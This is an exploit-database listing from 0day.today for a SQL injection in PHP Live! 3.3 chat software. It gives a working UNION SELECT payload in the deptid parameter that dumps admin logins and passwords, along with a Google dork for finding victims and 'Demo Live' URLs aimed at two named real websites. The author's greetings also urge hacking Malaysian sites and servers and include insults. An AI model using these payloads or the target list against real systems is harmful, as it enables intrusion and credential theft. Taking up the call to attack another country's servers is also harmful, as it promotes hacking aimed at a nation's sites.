[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability

Author
v3n0m
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5728
Category
web applications
Date add
01-09-2009
Platform
unsorted
=========================================================
PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability
=========================================================

*************************************************************************
,   .                                       |          |    o     |    
|   |,---.,---.,   .,---.,---.,---.,---.,---|,---.,---.|    .,---.|__/ 
`---'|   ||   ||   |,---||    ,---||    |   ||---'|    |    ||   ||  \ 
  |  `---'`---|`---|`---^`---'`---^`    `---'`---'`    `---'``   '`   `
  `       `---'`---'                                                   
*************************************************************************
[o] PHP Live! 3.3 (deptid) Remote SQL Injection

			--==[ Author ]==--
[+] Author	: v3n0m
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: September, 02-2009 [INDONESIA]
*************************************************************************
			--==[ Details ]==--
[+] Software	: PHP Live! Chat
[+] Version 	: v3.3
[+] Vendor 	: http://www.phplivesupport.com/
[+] Price	: $49.95
[+] Vulnerable	: Remote SQL Injection
[+] Google Dork	: "Powered by PHP Live! v3.3"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
    [xxx] = Valid x number

[-] Demo Live:
[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--


FYI: Think twice before you buy these vulnerable script for $49.95 ?

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,LeQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
		=> & para gay yogyagaylink bruakakakakakakak
Others		=> g0par Santiago,Don Tukulesto,mixbrainwasher
		=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks	=> mywisdom [nice 0-day, you're 31337]
		=> yadoy666 [Mari kita ganyang malingsianjink]
		=> Angela Zhang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
  be carefull your culture art & song,island get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 11:20pm in my bedroom, preparing office goes on...!!


#  0day.today [2024-12-25]  #